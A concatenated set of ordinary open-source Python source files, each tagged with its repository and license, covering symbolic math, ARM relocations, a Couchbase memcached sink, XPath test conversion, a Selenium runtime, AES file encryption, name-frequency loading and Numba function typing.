if (isinstance(a, Fn) and a.fn == self.fn) and not (isinstance(b, Fn) and b.fn == self.fn):
return -1
if (isinstance(b, Fn) and b.fn == self.fn) and not (isinstance(a, Fn) and a.fn == self.fn):
return 1
return simplify._order(a, b)
args.sort(_)
for i in args:
if isinstance(i, Fn) and i.fn == self.fn:
for j in i._get_assoc_arguments():
rv.append(j)
else:
rv.append(i)
return rv
@staticmethod
def LessThan(lhs, rhs):
return Fn(stdops.LessThan, lhs, rhs)
@staticmethod
def GreaterThan(lhs, rhs):
return Fn(stdops.GreaterThan, lhs, rhs)
@staticmethod
def LessThanEq(lhs, rhs):
return Fn(stdops.LessThanEq, lhs, rhs)
@staticmethod
def GreaterThanEq(lhs, rhs):
return Fn(stdops.GreaterThanEq, lhs, rhs)
@staticmethod
def Add(lhs, rhs):
return Fn(stdops.Add, lhs, rhs)
@staticmethod
def Sub(lhs, rhs):
return Fn(stdops.Sub, lhs, rhs)
@staticmethod
def Div(lhs, rhs):
return Fn(stdops.Div, lhs, rhs)
@staticmethod
def Mul(lhs, rhs):
return Fn(stdops.Mul, lhs, rhs)
@staticmethod
def Pow(lhs, rhs):
return Fn(stdops.Pow, lhs, rhs)
@staticmethod
def RShift(lhs, rhs):
return Fn(stdops.RShift, lhs, rhs)
@staticmethod
def LShift(lhs, rhs):
return Fn(stdops.LShift, lhs, rhs)
@staticmethod
def BitAnd(lhs, rhs):
return Fn(stdops.BitAnd, lhs, rhs)
@staticmethod
def BitOr(lhs, rhs):
return Fn(stdops.BitOr, lhs, rhs)
@staticmethod
def BitXor(lhs, rhs):
return Fn(stdops.BitXor, lhs, rhs)
def __str__(self):
if isinstance(self.fn, Symbol) and not self.name[0].isalnum() and len(self.args) == 2:
return '(%s %s %s)' % (self.args[0], self.name, self.args[1])
return '%s(%s)' % (self.fn, ','.join(map(str, self.args)))
def __repr__(self):
return str(self)
def symbols(symstr=None, **kargs):
'''
takes a string of symbols seperated by whitespace
returns a tuple of symbols
'''
if symstr == None:
syms = [''.join(random.choice(string.ascii_lowercase) for x in range(12))]
else:
syms = symstr.split(' ')
if len(syms) == 1:
return Symbol(syms[0], **kargs)
rv = []
for i in syms:
rv.append(Symbol(i, **kargs))
return tuple(rv)
def wilds(symstr, **kargs):
'''
wilds should match anything
'''
syms = symstr.split(' ')
if len(syms) == 1:
return Wild(syms[0], **kargs)
rv = []
for i in syms:
rv.append(Wild(i, **kargs))
return tuple(rv)
def wild(name=None, **kargs):
if name == None:
name = ''.join(random.choice(string.ascii_lowercase) for x in range(12))
return Wild(name, **kargs)
def symbolic(obj, **kargs):
'''
makes the symbolic version of an object
'''
if type(obj) in [type(0), type(0.0), type(0L), numpy.int32]:
return Number(obj, **kargs)
elif type(obj) == type('str'):
return Symbol(obj, **kargs)
elif type(obj) == type(True):
return Boolean(obj, **kargs)
elif isinstance(obj, _Symbolic):
return obj
else:
msg = "Unknown type (%s) %s passed to symbolic" % (type(obj), obj)
raise BaseException(msg)
def desymbolic(s):
'''
returns a numeric version of s
'''
if type(s) in (int,long,float):
return s
s = s.simplify()
if not isinstance(s, Number):
raise BaseException("Only numbers can be passed to desymbolic")
return s.value()
import stdops
| bniemczyk/symbolic | symath/core.py | Python | bsd-2-clause | 14,038 |
from ...utils.bitfun import encode_imm32, align, wrap_negative
from ..encoding import Relocation
from .isa import ArmToken, arm_isa
@arm_isa.register_relocation
class Rel8Relocation(Relocation):
name = "rel8"
token = ArmToken
field = "imm8"
def calc(self, sym_value, reloc_value):
assert sym_value % 2 == 0
offset = sym_value - (align(reloc_value, 2) + 4)
assert offset in range(-256, 254, 2), str(offset)
return wrap_negative(offset >> 1, 8)
@arm_isa.register_relocation
class Imm24Relocation(Relocation):
name = "imm24"
token = ArmToken
field = "imm24"
def calc(self, sym_value, reloc_value):
assert sym_value % 4 == 0
assert reloc_value % 4 == 0
offset = sym_value - (reloc_value + 8)
return wrap_negative(offset >> 2, 24)
@arm_isa.register_relocation
class LdrImm12Relocation(Relocation):
name = "ldr_imm12"
token = ArmToken
def apply(self, sym_value, data, reloc_value):
assert sym_value % 4 == 0
assert reloc_value % 4 == 0
offset = sym_value - (reloc_value + 8)
U = 1
if offset < 0:
offset = -offset
U = 0
assert offset < 4096, "{} < 4096 {} {}".format(offset, sym_value, data)
data[2] |= U << 7
data[1] |= (offset >> 8) & 0xF
data[0] = offset & 0xFF
return data
@arm_isa.register_relocation
class AdrImm12Relocation(Relocation):
name = "adr_imm12"
token = ArmToken
def apply(self, sym_value, data, reloc_value):
assert sym_value % 4 == 0
assert reloc_value % 4 == 0
offset = sym_value - (reloc_value + 8)
U = 2
if offset < 0:
offset = -offset
U = 1
assert offset < 4096
offset = encode_imm32(offset)
data[2] |= U << 6
data[1] |= (offset >> 8) & 0xF
data[0] = offset & 0xFF
return data
| windelbouwman/ppci-mirror | ppci/arch/arm/arm_relocations.py | Python | bsd-2-clause | 1,941 |
#!/usr/bin/env python
import logging
import socket
import struct
import time
import sys
import cb_bin_client
import couchbaseConstants
import pump
import cbsnappy as snappy
try:
import ctypes
except ImportError:
cb_path = '/opt/couchbase/lib/python'
while cb_path in sys.path:
sys.path.remove(cb_path)
try:
import ctypes
except ImportError:
sys.exit('error: could not import ctypes module')
else:
sys.path.insert(0, cb_path)
OP_MAP = {
'get': couchbaseConstants.CMD_GET,
'set': couchbaseConstants.CMD_SET,
'add': couchbaseConstants.CMD_ADD,
'delete': couchbaseConstants.CMD_DELETE,
}
OP_MAP_WITH_META = {
'get': couchbaseConstants.CMD_GET,
'set': couchbaseConstants.CMD_SET_WITH_META,
'add': couchbaseConstants.CMD_ADD_WITH_META,
'delete': couchbaseConstants.CMD_DELETE_WITH_META
}
class MCSink(pump.Sink):
"""Dumb client sink using binary memcached protocol.
Used when moxi or memcached is destination."""
def __init__(self, opts, spec, source_bucket, source_node,
source_map, sink_map, ctl, cur):
super(MCSink, self).__init__(opts, spec, source_bucket, source_node,
source_map, sink_map, ctl, cur)
self.op_map = OP_MAP
if opts.extra.get("try_xwm", 1):
self.op_map = OP_MAP_WITH_META
self.init_worker(MCSink.run)
self.uncompress = opts.extra.get("uncompress", 0)
def close(self):
self.push_next_batch(None, None)
@staticmethod
def check_base(opts, spec):
if getattr(opts, "destination_vbucket_state", "active") != "active":
return ("error: only --destination-vbucket-state=active" +
" is supported by this destination: %s") % (spec)
op = getattr(opts, "destination_operation", None)
if not op in [None, 'set', 'add', 'get']:
return ("error: --destination-operation unsupported value: %s" +
"; use set, add, get") % (op)
# Skip immediate superclass Sink.check_base(),
# since MCSink can handle different destination operations.
return pump.EndPoint.check_base(opts, spec)
@staticmethod
def run(self):
"""Worker thread to asynchronously store batches into sink."""
mconns = {} # State kept across scatter_gather() calls.
backoff_cap = self.opts.extra.get("backoff_cap", 10)
while not self.ctl['stop']:
batch, future = self.pull_next_batch()
if not batch:
self.future_done(future, 0)
self.close_mconns(mconns)
return
backoff = 0.1 # Reset backoff after a good batch.
while batch: # Loop in case retry is required.
rv, batch, need_backoff = self.scatter_gather(mconns, batch)
if rv != 0:
self.future_done(future, rv)
self.close_mconns(mconns)
return
if batch:
self.cur["tot_sink_retry_batch"] = \
self.cur.get("tot_sink_retry_batch", 0) + 1
if need_backoff:
backoff = min(backoff * 2.0, backoff_cap)
logging.warn("backing off, secs: %s" % (backoff))
time.sleep(backoff)
self.future_done(future, 0)
self.close_mconns(mconns)
def close_mconns(self, mconns):
for k, conn in mconns.items():
self.add_stop_event(conn)
conn.close()
def scatter_gather(self, mconns, batch):
conn = mconns.get("conn")
if not conn:
rv, conn = self.connect()
if rv != 0:
return rv, None
mconns["conn"] = conn
# TODO: (1) MCSink - run() handle --data parameter.
# Scatter or send phase.
rv = self.send_msgs(conn, batch.msgs, self.operation())
if rv != 0:
return rv, None, None
# Gather or recv phase.
rv, retry, refresh = self.recv_msgs(conn, batch.msgs)
if refresh:
self.refresh_sink_map()
if retry:
return rv, batch, True
return rv, None, None
def send_msgs(self, conn, msgs, operation, vbucket_id=None):
m = []
msg_format_length = 0
for i, msg in enumerate(msgs):
if not msg_format_length:
msg_format_length = len(msg)
cmd, vbucket_id_msg, key, flg, exp, cas, meta, val = msg[:8]
seqno = dtype = nmeta = conf_res = 0
if msg_format_length > 8:
seqno, dtype, nmeta, conf_res = msg[8:]
if vbucket_id is not None:
vbucket_id_msg = vbucket_id
if self.skip(key, vbucket_id_msg):
continue
rv, cmd = self.translate_cmd(cmd, operation, meta)
if rv != 0:
return rv
if dtype > 2:
if self.uncompress and val:
try:
val = snappy.uncompress(val)
except Exception, err:
pass
if cmd == couchbaseConstants.CMD_GET:
val, flg, exp, cas = '', 0, 0, 0
if cmd == couchbaseConstants.CMD_NOOP:
key, val, flg, exp, cas = '', '', 0, 0, 0
if cmd in (couchbaseConstants.CMD_DELETE, couchbaseConstants.CMD_DELETE_WITH_META):
val = ''
rv, req = self.cmd_request(cmd, vbucket_id_msg, key, val,
ctypes.c_uint32(flg).value,
exp, cas, meta, i, dtype, nmeta,
conf_res)
if rv != 0:
return rv
self.append_req(m, req)
if m:
try:
conn.s.send(''.join(m))
except socket.error, e:
return "error: conn.send() exception: %s" % (e)
return 0
def recv_msgs(self, conn, msgs, vbucket_id=None, verify_opaque=True):
refresh = False
retry = False
for i, msg in enumerate(msgs):
cmd, vbucket_id_msg, key, flg, exp, cas, meta, val = msg[:8]
if vbucket_id is not None:
vbucket_id_msg = vbucket_id
if self.skip(key, vbucket_id_msg):
continue
try:
r_cmd, r_status, r_ext, r_key, r_val, r_cas, r_opaque = \
self.read_conn(conn)
if verify_opaque and i != r_opaque:
return "error: opaque mismatch: %s %s" % (i, r_opaque), None, None
if r_status == couchbaseConstants.ERR_SUCCESS:
continue
elif r_status == couchbaseConstants.ERR_KEY_EEXISTS:
#logging.warn("item exists: %s, key: %s" %
# (self.spec, key))
continue
elif r_status == couchbaseConstants.ERR_KEY_ENOENT:
if (cmd != couchbaseConstants.CMD_TAP_DELETE and
cmd != couchbaseConstants.CMD_GET):
logging.warn("item not found: %s, key: %s" %
(self.spec, key))
continue
elif (r_status == couchbaseConstants.ERR_ETMPFAIL or
r_status == couchbaseConstants.ERR_EBUSY or
r_status == couchbaseConstants.ERR_ENOMEM):
retry = True # Retry the whole batch again next time.
continue # But, finish recv'ing current batch.
elif r_status == couchbaseConstants.ERR_NOT_MY_VBUCKET:
msg = ("received NOT_MY_VBUCKET;"
" perhaps the cluster is/was rebalancing;"
" vbucket_id: %s, key: %s, spec: %s, host:port: %s:%s"
% (vbucket_id_msg, key, self.spec,
conn.host, conn.port))
if self.opts.extra.get("nmv_retry", 1):
logging.warn("warning: " + msg)
refresh = True
retry = True
self.cur["tot_sink_not_my_vbucket"] = \
self.cur.get("tot_sink_not_my_vbucket", 0) + 1
else:
return "error: " + msg, None, None
elif r_status == couchbaseConstants.ERR_UNKNOWN_COMMAND:
if self.op_map == OP_MAP:
if not retry:
return "error: unknown command: %s" % (r_cmd), None, None
else:
if not retry:
logging.warn("destination does not take XXX-WITH-META"
" commands; will use META-less commands")
self.op_map = OP_MAP
retry = True
else:
return "error: MCSink MC error: " + str(r_status), None, None
except Exception, e:
logging.error("MCSink exception: %s", e)
return "error: MCSink exception: " + str(e), None, None
return 0, retry, refresh
def translate_cmd(self, cmd, op, meta):
if len(str(meta)) <= 0:
# The source gave no meta, so use regular commands.
self.op_map = OP_MAP
if cmd in[couchbaseConstants.CMD_TAP_MUTATION, couchbaseConstants.CMD_DCP_MUTATION] :
m = self.op_map.get(op, None)
if m:
return 0, m
return "error: MCSink.translate_cmd, unsupported op: " + op, None
if cmd in [couchbaseConstants.CMD_TAP_DELETE, couchbaseConstants.CMD_DCP_DELETE]:
if op == 'get':
return 0, couchbaseConstants.CMD_NOOP
return 0, self.op_map['delete']
if cmd == couchbaseConstants.CMD_GET:
return 0, cmd
return "error: MCSink - unknown cmd: %s, op: %s" % (cmd, op), None
def append_req(self, m, req):
hdr, ext, key, val, extra_meta = req
m.append(hdr)
if ext:
m.append(ext)
if key:
m.append(str(key))
if val:
m.append(str(val))
if extra_meta:
m.append(extra_meta)
@staticmethod
def can_handle(opts, spec):
return (spec.startswith("memcached://") or
spec.startswith("memcached-binary://"))
@staticmethod
def check(opts, spec, source_map):
host, port, user, pswd, path = \
pump.parse_spec(opts, spec, int(getattr(opts, "port", 11211)))
if opts.ssl:
ports = couchbaseConstants.SSL_PORT
rv, conn = MCSink.connect_mc(host, port, user, pswd)
if rv != 0:
return rv, None
conn.close()
return 0, None
def refresh_sink_map(self):
return 0
@staticmethod
def consume_design(opts, sink_spec, sink_map,
source_bucket, source_map, source_design):
if source_design:
logging.warn("warning: cannot restore bucket design"
" on a memached destination")
return 0
def consume_batch_async(self, batch):
return self.push_next_batch(batch, pump.SinkBatchFuture(self, batch))
def connect(self):
host, port, user, pswd, path = \
pump.parse_spec(self.opts, self.spec,
int(getattr(self.opts, "port", 11211)))
if self.opts.ssl:
port = couchbaseConstants.SSL_PORT
return MCSink.connect_mc(host, port, user, pswd)
@staticmethod
def connect_mc(host, port, user, pswd):
mc = cb_bin_client.MemcachedClient(host, int(port))
if user:
try:
mc.sasl_auth_cram_md5(str(user), str(pswd))
except cb_bin_client.MemcachedError:
try:
mc.sasl_auth_plain(str(user), str(pswd))
except EOFError:
return "error: SASL auth error: %s:%s, user: %s" % \
(host, port, user), None
except cb_bin_client.MemcachedError:
return "error: SASL auth failed: %s:%s, user: %s" % \
(host, port, user), None
except socket.error:
return "error: SASL auth exception: %s:%s, user: %s" % \
(host, port, user), None
except EOFError:
return "error: SASL auth error: %s:%s, user: %s" % \
(host, port, user), None
except socket.error:
return "error: SASL auth exception: %s:%s, user: %s" % \
(host, port, user), None
return 0, mc
def cmd_request(self, cmd, vbucket_id, key, val, flg, exp, cas, meta, opaque, dtype, nmeta, conf_res):
ext_meta = ''
if (cmd == couchbaseConstants.CMD_SET_WITH_META or
cmd == couchbaseConstants.CMD_ADD_WITH_META or
cmd == couchbaseConstants.CMD_DELETE_WITH_META):
if meta:
try:
ext = struct.pack(">IIQQ", flg, exp, int(str(meta)), cas)
except ValueError:
seq_no = str(meta)
if len(seq_no) > 8:
seq_no = seq_no[0:8]
if len(seq_no) < 8:
# The seq_no might be 32-bits from 2.0DP4, so pad with 0x00's.
seq_no = ('\x00\x00\x00\x00\x00\x00\x00\x00' + seq_no)[-8:]
check_seqno, = struct.unpack(">Q", seq_no)
if check_seqno:
ext = (struct.pack(">II", flg, exp) + seq_no +
struct.pack(">Q", cas))
else:
ext = struct.pack(">IIQQ", flg, exp, 1, cas)
else:
ext = struct.pack(">IIQQ", flg, exp, 1, cas)
if conf_res:
extra_meta = struct.pack(">BBHH",
couchbaseConstants.DCP_EXTRA_META_VERSION,
couchbaseConstants.DCP_EXTRA_META_CONFLICT_RESOLUTION,
con_res_len,
conf_res)
ext += struct.pack(">H", len(extra_meta))
elif (cmd == couchbaseConstants.CMD_SET or
cmd == couchbaseConstants.CMD_ADD):
ext = struct.pack(couchbaseConstants.SET_PKT_FMT, flg, exp)
elif (cmd == couchbaseConstants.CMD_DELETE or
cmd == couchbaseConstants.CMD_GET or
cmd == couchbaseConstants.CMD_NOOP):
ext = ''
else:
return "error: MCSink - unknown cmd for request: " + str(cmd), None
hdr = self.cmd_header(cmd, vbucket_id, key, val, ext, 0, opaque, dtype)
return 0, (hdr, ext, key, val, ext_meta)
def cmd_header(self, cmd, vbucket_id, key, val, ext, cas, opaque,
dtype=0,
fmt=couchbaseConstants.REQ_PKT_FMT,
magic=couchbaseConstants.REQ_MAGIC_BYTE):
#MB-11902
dtype = 0
return struct.pack(fmt, magic, cmd,
len(key), len(ext), dtype, vbucket_id,
len(key) + len(ext) + len(val), opaque, cas)
def read_conn(self, conn):
ext = ''
key = ''
val = ''
buf, cmd, errcode, extlen, keylen, data, cas, opaque = \
self.recv_msg(conn.s, getattr(conn, 'buf', ''))
conn.buf = buf
if data:
ext = data[0:extlen]
key = data[extlen:extlen+keylen]
val = data[extlen+keylen:]
return cmd, errcode, ext, key, val, cas, opaque
def recv_msg(self, sock, buf):
pkt, buf = self.recv(sock, couchbaseConstants.MIN_RECV_PACKET, buf)
if not pkt:
raise EOFError()
magic, cmd, keylen, extlen, dtype, errcode, datalen, opaque, cas = \
struct.unpack(couchbaseConstants.RES_PKT_FMT, pkt)
if magic != couchbaseConstants.RES_MAGIC_BYTE:
raise Exception("unexpected recv_msg magic: " + str(magic))
data, buf = self.recv(sock, datalen, buf)
return buf, cmd, errcode, extlen, keylen, data, cas, opaque
def recv(self, skt, nbytes, buf):
while len(buf) < nbytes:
data = None
try:
data = skt.recv(max(nbytes - len(buf), 4096))
except socket.timeout:
logging.error("error: recv socket.timeout")
except Exception, e:
logging.error("error: recv exception: " + str(e))
if not data:
return None, ''
buf += data
return buf[:nbytes], buf[nbytes:]
| TOTVS/mdmpublic | couchbase-cli/lib/python/pump_mc.py | Python | bsd-2-clause | 17,056 |
import argparse
import os
import json
import sys
from lxml import etree
def process_file(name):
tree = etree.parse(name)
xpath = tree.xpath("//xsl:when/@test",
namespaces={"xsl": "http://www.w3.org/1999/XSL/Transform"})
test_xml = tree.xpath("/xsl:stylesheet/xsl:template/xsl:if[@test='false()']",
namespaces={"xsl": "http://www.w3.org/1999/XSL/Transform"})
if not xpath:
print("couldn't find xpath in %s" % name)
sys.exit(1)
xpath = xpath[0]
if not (len(test_xml[0]) == 1):
print("test didn't have single root element, %s" % name)
print(test_xml)
sys.exit(1)
return xpath, test_xml[0][0]
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Convert XPath tests.')
parser.add_argument('in_dir', metavar='IN', help='path to presto-testo XPath tests')
parser.add_argument('out_dir', metavar='OUT', default="new",
help='path to output new XPath tests')
args = parser.parse_args()
tests = etree.fromstring("<tests/>")
d = args.in_dir
files = os.listdir(d)
for f in files:
if f.endswith(".xml") and f != "ref.xml":
xpath, test_xml = process_file(os.path.join(d, f))
test = etree.Element("test")
tests.append(test)
test.append(etree.Element("xpath"))
test.append(etree.Element("tree"))
test[0].text = xpath
test[1].append(test_xml)
with open(os.path.join(args.out_dir, "tests.xml"), "wb") as fp:
wrapped = etree.ElementTree(tests)
wrapped.write(fp, encoding="ascii", pretty_print=True, exclusive=True)
| gsnedders/presto-testo-converters | convert_xpath.py | Python | bsd-2-clause | 1,711 |
""" Web runtime based on Selenium.
Selenium is a Python library to automate browsers.
"""
from .common import BaseRuntime
class SeleniumRuntime(BaseRuntime):
""" Runtime based on Selenium (http://www.seleniumhq.org/), a tool
to automate browsers, e.g. for testing. Requires the Python package
"selenium" to be installed.
"""
def _launch(self):
# Get url and browser type
url = self._kwargs['url']
type = self._kwargs.get('type', '')
self._driver = None
# Import here; selenium is an optional dependency
from selenium import webdriver
if type.lower() == 'firefox':
self._driver = webdriver.Firefox()
elif type.lower() == 'chrome':
self._driver = webdriver.Chrome()
elif type.lower() == 'ie':
self._driver = webdriver.Ie()
elif type:
classname = None
type2 = type[0].upper() + type[1:]
if hasattr(webdriver, type):
classname = type
elif hasattr(webdriver, type2):
classname = type2
if classname:
self._driver = getattr(webdriver, classname)()
else:
raise ValueError('Unknown Selenium browser type %r' % type)
else:
raise ValueError('To use selenium runtime specify a browser type".')
# Open page
self._driver.get(url)
def close(self):
if self._driver:
self._driver.close()
self._driver = None
@property
def driver(self):
""" The Selenium webdriver object. Use this to control the browser.
"""
return self._driver
| JohnLunzer/flexx | flexx/webruntime/selenium.py | Python | bsd-2-clause | 1,783 |
from Crypto.Cipher import AES
import struct
CHUNK_SIZE = 32768
def encrypt_chunk(f, aes):
chunk = f.read(CHUNK_SIZE)
realn = len(chunk)
if realn == 0:
return ''
if realn % 16 != 0:
padding = 16 - (realn % 16)
chunk += ' ' * padding
head = struct.pack('!H', realn)
return head + aes.encrypt(chunk)
def decrypt_chunk(f, aes):
headn = struct.calcsize('!H')
head = f.read(headn)
if len(head) == 0:
return ''
realn, = struct.unpack('!H', head)
if realn % 16 != 0:
n = realn + (16 - (realn % 16))
else:
n = realn
chunk = f.read(n)
plain = aes.decrypt(chunk)
return plain[:realn]
def transform_file(infname, outfname, key, chunk_func):
inf = open(infname, 'rb')
outf = open(outfname, 'wb')
aes = AES.new(key)
chunk = chunk_func(inf, aes)
while chunk:
outf.write(chunk)
chunk = chunk_func(inf, aes)
inf.close()
outf.close()
def encrypt_file(infname, outfname, key):
transform_file(infname, outfname, key, encrypt_chunk)
def decrypt_file(infname, outfname, key):
transform_file(infname, outfname, key, decrypt_chunk)
| zhemao/bootlegger | bootlegger/cryptfile.py | Python | bsd-2-clause | 1,195 |
import os.path
import subprocess
import sys
import prob_util
CODEBASE_DIR = subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip('\n')
MALE_NAME_FILE = os.path.join(CODEBASE_DIR, 'data', 'male-first.txt')
FEMALE_NAME_FILE = os.path.join(CODEBASE_DIR, 'data', 'female-first.txt')
LASTNAME_FILE = os.path.join(CODEBASE_DIR, 'data', 'lastnames.txt')
def load_name_data(fpath):
""" Loads name data as list of names paired with frequency """
with open(fpath, 'r') as fp:
data = [x.split(' ') for x in fp.read().split('\n') if len(x) > 0]
stat_data = [(x[0], float(x[1])) for x in data]
total = [freq for _, freq in stat_data]
scale = 100.0 / sum(total)
stat_data = [(name, scale * freq / 100.0) for name, freq in stat_data]
assert abs(1.0 - sum([freq for _,freq in stat_data])) < 1e-6, "Frequencies should sum to 1.0"
return stat_data
def load_all_names():
files = [MALE_NAME_FILE, FEMALE_NAME_FILE, LASTNAME_FILE]
lists = [ ]
for file in files:
lists.append(load_name_data(file))
male_freq_list = prob_util.freq_list_from_tuple_list(lists[0])
female_freq_list = prob_util.freq_list_from_tuple_list(lists[1])
last_freq_list = prob_util.freq_list_from_tuple_list(lists[2])
return male_freq_list, female_freq_list, last_freq_list
"""
if __name__ == "__main__":
infile = sys.argv[1]
outfile = sys.argv[2] if len(sys.argv) > 2 else sys.argv[1]
with open(infile, "r") as inf:
raw = inf.read()
raw = raw.split('\n')
freq_names = []
for line in raw:
if len(line) < 1:
continue
line = [l for l in line.split(' ') if len(l) > 0]
freq_names.append( (line[0], line[1]) )
with open(outfile, "w+") as outf:
for name, freq in freq_names:
outf.write(name + ' ' + freq + '\n')
"""
| iveygman/namegen | util/names.py | Python | bsd-2-clause | 1,858 |
# pylint: disable=W0401
from .test_triggers import *
from .test_views import *
from .test_factories import *
from .test_path_filter import *
from .test_topology import *
from .test_path_split import *
from .test_filters import *
from .test_graph import *
from .test_forms import *
from .test_fields import *
from .test_models import *
| camillemonchicourt/Geotrek | geotrek/core/tests/__init__.py | Python | bsd-2-clause | 336 |
import traceback
from collections import namedtuple, defaultdict
import itertools
import logging
import textwrap
from shutil import get_terminal_size
from .abstract import Callable, DTypeSpec, Dummy, Literal, Type, weakref
from .common import Opaque
from .misc import unliteral
from numba.core import errors, utils, types, config
from numba.core.typeconv import Conversion
_logger = logging.getLogger(__name__)
# terminal color markup
_termcolor = errors.termcolor()
_FAILURE = namedtuple('_FAILURE', 'template matched error literal')
_termwidth = get_terminal_size().columns
# pull out the lead line as unit tests often use this
_header_lead = "No implementation of function"
_header_template = (_header_lead + " {the_function} found for signature:\n \n "
">>> {fname}({signature})\n \nThere are {ncandidates} "
"candidate implementations:")
_reason_template = """
" - Of which {nmatches} did not match due to:\n
"""
def _wrapper(tmp, indent=0):
return textwrap.indent(tmp, ' ' * indent, lambda line: True)
_overload_template = ("- Of which {nduplicates} did not match due to:\n"
"{kind} {inof} function '{function}': File: {file}: "
"Line {line}.\n With argument(s): '({args})':")
_err_reasons = {'specific_error': "Rejected as the implementation raised a "
"specific error:\n{}"}
def _bt_as_lines(bt):
"""
Converts a backtrace into a list of lines, squashes it a bit on the way.
"""
return [y for y in itertools.chain(*[x.split('\n') for x in bt]) if y]
def argsnkwargs_to_str(args, kwargs):
buf = [str(a) for a in tuple(args)]
buf.extend(["{}={}".format(k, v) for k, v in kwargs.items()])
return ', '.join(buf)
class _ResolutionFailures(object):
"""Collect and format function resolution failures.
"""
def __init__(self, context, function_type, args, kwargs, depth=0):
self._context = context
self._function_type = function_type
self._args = args
self._kwargs = kwargs
self._failures = defaultdict(list)
self._depth = depth
self._max_depth = 5
self._scale = 2
def __len__(self):
return len(self._failures)
def add_error(self, calltemplate, matched, error, literal):
"""
Args
----
calltemplate : CallTemplate
error : Exception or str
Error message
"""
isexc = isinstance(error, Exception)
errclazz = '%s: ' % type(error).__name__ if isexc else ''
key = "{}{}".format(errclazz, str(error))
self._failures[key].append(_FAILURE(calltemplate, matched, error,
literal))
def format(self):
"""Return a formatted error message from all the gathered errors.
"""
indent = ' ' * self._scale
argstr = argsnkwargs_to_str(self._args, self._kwargs)
ncandidates = sum([len(x) for x in self._failures.values()])
# sort out a display name for the function
tykey = self._function_type.typing_key
# most things have __name__
fname = getattr(tykey, '__name__', None)
is_external_fn_ptr = isinstance(self._function_type,
ExternalFunctionPointer)
if fname is None:
if is_external_fn_ptr:
fname = "ExternalFunctionPointer"
else:
fname = "<unknown function>"
msgbuf = [_header_template.format(the_function=self._function_type,
fname=fname,
signature=argstr,
ncandidates=ncandidates)]
nolitargs = tuple([unliteral(a) for a in self._args])
nolitkwargs = {k: unliteral(v) for k, v in self._kwargs.items()}
nolitargstr = argsnkwargs_to_str(nolitargs, nolitkwargs)
# depth could potentially get massive, so limit it.
ldepth = min(max(self._depth, 0), self._max_depth)
def template_info(tp):
src_info = tp.get_template_info()
unknown = "unknown"
source_name = src_info.get('name', unknown)
source_file = src_info.get('filename', unknown)
source_lines = src_info.get('lines', unknown)
source_kind = src_info.get('kind', 'Unknown template')
return source_name, source_file, source_lines, source_kind
for i, (k, err_list) in enumerate(self._failures.items()):
err = err_list[0]
nduplicates = len(err_list)
template, error = err.template, err.error
ifo = template_info(template)
source_name, source_file, source_lines, source_kind = ifo
largstr = argstr if err.literal else nolitargstr
if err.error == "No match.":
err_dict = defaultdict(set)
for errs in err_list:
err_dict[errs.template].add(errs.literal)
# if there's just one template, and it's erroring on
# literal/nonliteral be specific
if len(err_dict) == 1:
template = [_ for _ in err_dict.keys()][0]
source_name, source_file, source_lines, source_kind = \
template_info(template)
source_lines = source_lines[0]
else:
source_file = "<numerous>"
source_lines = "N/A"
msgbuf.append(_termcolor.errmsg(
_wrapper(_overload_template.format(nduplicates=nduplicates,
kind=source_kind.title(),
function=fname,
inof='of',
file=source_file,
line=source_lines,
args=largstr),
ldepth + 1)))
msgbuf.append(_termcolor.highlight(_wrapper(err.error,
ldepth + 2)))
else:
# There was at least one match in this failure class, but it
# failed for a specific reason try and report this.
msgbuf.append(_termcolor.errmsg(
_wrapper(_overload_template.format(nduplicates=nduplicates,
kind=source_kind.title(),
function=source_name,
inof='in',
file=source_file,
line=source_lines[0],
args=largstr),
ldepth + 1)))
if isinstance(error, BaseException):
reason = indent + self.format_error(error)
errstr = _err_reasons['specific_error'].format(reason)
else:
errstr = error
# if you are a developer, show the back traces
if config.DEVELOPER_MODE:
if isinstance(error, BaseException):
# if the error is an actual exception instance, trace it
bt = traceback.format_exception(type(error), error,
error.__traceback__)
else:
bt = [""]
bt_as_lines = _bt_as_lines(bt)
nd2indent = '\n{}'.format(2 * indent)
errstr += _termcolor.reset(nd2indent +
nd2indent.join(bt_as_lines))
msgbuf.append(_termcolor.highlight(_wrapper(errstr,
ldepth + 2)))
loc = self.get_loc(template, error)
if loc:
msgbuf.append('{}raised from {}'.format(indent, loc))
# the commented bit rewraps each block, may not be helpful?!
return _wrapper('\n'.join(msgbuf) + '\n') # , self._scale * ldepth)
def format_error(self, error):
"""Format error message or exception
"""
if isinstance(error, Exception):
return '{}: {}'.format(type(error).__name__, error)
else:
return '{}'.format(error)
def get_loc(self, classtemplate, error):
"""Get source location information from the error message.
"""
if isinstance(error, Exception) and hasattr(error, '__traceback__'):
# traceback is unavailable in py2
frame = traceback.extract_tb(error.__traceback__)[-1]
return "{}:{}".format(frame[0], frame[1])
def raise_error(self):
for faillist in self._failures.values():
for fail in faillist:
if isinstance(fail.error, errors.ForceLiteralArg):
raise fail.error
raise errors.TypingError(self.format())
def _unlit_non_poison(ty):
"""Apply unliteral(ty) and raise a TypingError if type is Poison.
"""
out = unliteral(ty)
if isinstance(out, types.Poison):
m = f"Poison type used in arguments; got {out}"
raise errors.TypingError(m)
return out
class BaseFunction(Callable):
"""
Base type class for some function types.
"""
def __init__(self, template):
if isinstance(template, (list, tuple)):
self.templates = tuple(template)
keys = set(temp.key for temp in self.templates)
if len(keys) != 1:
raise ValueError("incompatible templates: keys = %s"
% (keys,))
self.typing_key, = keys
else:
self.templates = (template,)
self.typing_key = template.key
self._impl_keys = {}
name = "%s(%s)" % (self.__class__.__name__, self.typing_key)
self._depth = 0
super(BaseFunction, self).__init__(name)
@property
def key(self):
return self.typing_key, self.templates
def augment(self, other):
"""
Augment this function type with the other function types' templates,
so as to support more input types.
"""
if type(other) is type(self) and other.typing_key == self.typing_key:
return type(self)(self.templates + other.templates)
def get_impl_key(self, sig):
"""
Get the implementation key (used by the target context) for the
given signature.
"""
return self._impl_keys[sig.args]
def get_call_type(self, context, args, kws):
from numba.core.target_extension import (target_registry,
get_local_target)
prefer_lit = [True, False] # old behavior preferring literal
prefer_not = [False, True] # new behavior preferring non-literal
failures = _ResolutionFailures(context, self, args, kws,
depth=self._depth)
# get the current target target
target_hw = get_local_target(context)
# fish out templates that are specific to the target if a target is
# specified
DEFAULT_TARGET = 'generic'
usable = []
for ix, temp_cls in enumerate(self.templates):
# ? Need to do something about this next line
hw = temp_cls.metadata.get('target', DEFAULT_TARGET)
if hw is not None:
hw_clazz = target_registry[hw]
if target_hw.inherits_from(hw_clazz):
